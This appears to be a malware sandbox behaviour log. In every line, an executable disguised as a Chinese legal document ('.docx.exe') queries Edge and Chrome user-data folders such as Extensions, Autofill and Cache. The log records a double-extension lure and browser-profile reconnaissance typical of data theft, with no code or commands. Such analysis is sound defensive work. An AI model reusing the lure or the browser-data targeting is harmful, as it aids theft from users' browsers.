Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231004.1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231006.1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List\2.0.0.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
